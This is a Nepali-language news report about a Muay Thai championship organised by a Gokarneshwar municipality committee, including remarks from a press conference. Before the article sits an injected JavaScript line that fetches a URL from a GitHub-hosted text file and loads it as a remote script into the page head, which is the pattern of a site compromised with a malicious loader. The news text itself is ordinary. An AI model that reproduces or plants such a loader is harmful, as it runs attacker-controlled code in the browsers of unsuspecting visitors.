;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत्र १२,
काठमाडौं। गोकर्णेश्वर नगरपालिका मुवांथाइ नगर कमिटीले ‘नेपाल मुवाथाई च्यामपियन’ गर्न लागेको छ। स्वास्थ्यको लागि खेलकुद, गोकर्नेश्वोरको लागि खेलाडी भन्ने मूल नाराको साथमा २०७७ साल चैत्र १४ गते गोकर्णेश्वर नगरपालिका वडा नं ४ स्थित गोकर्णेश्वर मन्दिर प्रांगणमा खेल हुन लागेको अत्तरखेलमा आयोजित पत्रकार सम्मलेनमा गोकर्णेश्वर मुवांथाइ नगर कमिटी अध्यक्ष सानुकुमार श्रेष्ठले जुनेली न्युजलाइ जानकारी गराए।
पत्रकार सम्मेलनमा खेलको उदेश्य माथि प्रकाश पर्दै रक्षात्मक तथा आक्रामक योजना तथा विशिष्ट रणनीतिक कुराहरुको विकास गरि हरेक क्रियाकलापहरुलाई अगाडी बढाउन मदत गर्ने बताए।
उनले देश गाउ र टोलमा भएका विसंगति बिकृतिहरु र कुलतमा लागेका युवाहरुलाई सहि दिशामा लाग्न उत्प्रेरित गराउन सहयोग पुग्ने बिश्वासका साथ् कार्यक्रम आयोजना गर्न लागेको बताए ।उनले गोकर्णेश्वर नगरपालिकाका खेलाडीहरुले राष्ट्रिय तथा अन्तर्राष्ट्रिय प्रतियोगितामा भाग लिई बिभिन्न पदक हासिल गरि देशको नाम राख्न सफल भएको बताउदै सो कार्यक्रमलाइ पनि सफल बनाउन सबैको सहयोगको अपेक्षा गरेका छन ।
पत्रकार सम्मेलनमा मुवांथाइका कोषाध्यक्ष निराजन सेढाई, सदस्य शिवहरी श्रेष्ठ ,श्याम कृष्ण श्रेष्ठ नोर्सांग शेर्पा,सहसचिब प्रकाश बस्नेत सहित खेलाडी र पत्रकारहरुको उपस्थिति रहेको थियो
फेसबुक प्रतिक्रियाहरु